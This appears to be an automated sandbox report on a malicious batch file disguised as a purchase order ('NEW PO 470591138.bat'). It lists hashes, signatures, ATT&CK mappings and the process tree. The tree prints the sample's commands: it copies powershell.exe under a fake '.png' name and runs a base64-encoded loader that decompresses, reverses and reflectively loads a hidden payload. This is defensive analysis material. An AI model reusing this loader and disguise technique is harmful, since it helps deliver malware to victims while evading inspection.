5d651d666b5f0c6a03d0353bce5935e20d994b2106f548b0f78cccd0001031db

General

Target

NEW PO 470591138.bat
Size

1009KB
MD5

4b53cdbf9013cc0b738a3b8dc5e8e8a2
SHA1

794039eee5023135e201ef412fea4b5165255095
SHA256

1c4310634bcd157cddd7fc5ba3de47e902e6c3341e037b827bc033fe2540a471
SHA512

3b22977f2053c44caeccfc0b31b2a3b219c8e58fb1d0f4c19cd78ee6e9af75a4547f289e6aa74d70ef3b7ebb21effcc65ee735f4566a99ab1d291a64f7380c45
SSDEEP

24576:hz6hXyNmOFzhNxZAdcFiZuRlqzk2MyTwSK+H88fF:RZU4AQCwSrl

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2336	Iitjig.png

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2336	Iitjig.png

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 1140 wrote to memory of 3020	1140	cmd.exe	23
PID 1140 wrote to memory of 3020	1140	cmd.exe	23
PID 1140 wrote to memory of 3020	1140	cmd.exe	23
PID 1140 wrote to memory of 2664	1140	cmd.exe	22
PID 1140 wrote to memory of 2664	1140	cmd.exe	22
PID 1140 wrote to memory of 2664	1140	cmd.exe	22
PID 1140 wrote to memory of 2808	1140	cmd.exe	21
PID 1140 wrote to memory of 2808	1140	cmd.exe	21
PID 1140 wrote to memory of 2808	1140	cmd.exe	21
PID 2808 wrote to memory of 2844	2808	cmd.exe	19
PID 2808 wrote to memory of 2844	2808	cmd.exe	19
PID 2808 wrote to memory of 2844	2808	cmd.exe	19
PID 2808 wrote to memory of 2960	2808	cmd.exe	18
PID 2808 wrote to memory of 2960	2808	cmd.exe	18
PID 2808 wrote to memory of 2960	2808	cmd.exe	18
PID 2808 wrote to memory of 2724	2808	cmd.exe	17
PID 2808 wrote to memory of 2724	2808	cmd.exe	17
PID 2808 wrote to memory of 2724	2808	cmd.exe	17
PID 2808 wrote to memory of 2276	2808	cmd.exe	15
PID 2808 wrote to memory of 2276	2808	cmd.exe	15
PID 2808 wrote to memory of 2276	2808	cmd.exe	15
PID 2808 wrote to memory of 2336	2808	cmd.exe	16
PID 2808 wrote to memory of 2336	2808	cmd.exe	16
PID 2808 wrote to memory of 2336	2808	cmd.exe	16
PID 2808 wrote to memory of 2336	2808	cmd.exe	16

C:\Windows\system32\xcopy.exe
xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\NEW PO 470591138.bat" C:\Users\Admin\AppData\Local\Temp\Iitjig.png.bat
1⤵
PID:2276

C:\Users\Admin\AppData\Local\Temp\Iitjig.png
C:\Users\Admin\AppData\Local\Temp\Iitjig.png -win 1 -enc JABVAGkAcABuAHgAcgAgAD0AIABbAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABMAGkAbgBlAHMAKAAoACgAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAIgAuAGIAYQB0ACIAKQAsACAAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBsAGEAcwB0ACAAMQA7ACAAJABaAHkAdgB5AG8AeAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABVAGkAcABuAHgAcgApADsAJABQAHMAcQBxAHYAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAeQB2AHkAbwB4ACAAKQA7ACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAEoAZABjAGMAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABQAHMAcQBxAHYALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEoAZABjAGMAcwAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQASgBkAGMAYwBzAC4AQwBsAG8AcwBlACgAKQA7ACQAUABzAHEAcQB2AC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWgB5AHYAeQBvAHgAIAA9ACAAJABvAHUAdABwAHUAdAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgB5AHYAeQBvAHgAKQA7ACAAJABYAGsAbAB5AHYAcABsAHIAYQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABaAHkAdgB5AG8AeAApADsAIAAkAFQAaAB1AHIAdQByAHEAbABzAGoAIAA9ACAAJABYAGsAbAB5AHYAcABsAHIAYQAuAEcAZQB0AEUAeABwAG8AcgB0AGUAZABUAHkAcABlAHMAKAApAFsAMABdADsAIAAkAEIAZgB3AGYAaABpAHAAIAA9ACAAJABUAGgAdQByAHUAcgBxAGwAcwBqAC4ARwBlAHQATQBlAHQAaABvAGQAcwAoACkAWwAwAF0ALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
1⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
1⤵
PID:2724

C:\Windows\system32\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Iitjig.png
1⤵
PID:2960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
1⤵
PID:2844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW PO 470591138.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2808

C:\Windows\system32\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Iitjig.png
1⤵
PID:2664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
1⤵
PID:3020

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\NEW PO 470591138.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Iitjig.png

Filesize
48KB

MD5
5c502517e3b211a1ad9cca933e08eab6

SHA1
1d0a8fd432e07a779c5ba4df46de752c7fde43c3

SHA256
0274c586b8312501036263b4fcf002a31d4b38892abcb7a9d380183b6cbee5db

SHA512
b14a06924f914902e201d795caec3d55907e1085456762ae3ab46d9356e46098a6ce17491148f6f522fdc1af3b32ac43d506a05d953cb5b008b83876a7d0ca6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Iitjig.png

Filesize
93KB

MD5
a733b79e9584a7d5e974590f7a833cb9

SHA1
f033184c5d2f9c4409ca99cb3109ba6273ffee06

SHA256
edcd5d2398cc9365e4714437d77fd97ae635d5587591a075e3bf53806aae7458

SHA512
9f266100b0ba5b934da30cb1439646704bb7e3ff8250c614ad8118c448e3d9d8e87bb95df2a738a30cb7f6530bbf0fef8b6131e19cc7c7e3e36e996d9ea585a5

Download Submit
memory/2336-8-0x00000000747B0000-0x0000000074D5B000-memory.dmp

Filesize
5.7MB

Download
memory/2336-9-0x00000000747B0000-0x0000000074D5B000-memory.dmp

Filesize
5.7MB

Download
memory/2336-10-0x0000000002560000-0x00000000025A0000-memory.dmp

Filesize
256KB

Download
memory/2336-11-0x0000000002560000-0x00000000025A0000-memory.dmp

Filesize
256KB

Download
memory/2336-12-0x0000000002560000-0x00000000025A0000-memory.dmp

Filesize
256KB

Download
memory/2336-13-0x00000000747B0000-0x0000000074D5B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing